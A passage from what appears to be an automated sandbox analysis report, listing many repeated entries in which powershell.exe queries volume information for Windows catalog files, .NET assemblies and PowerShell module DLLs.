Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0210~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
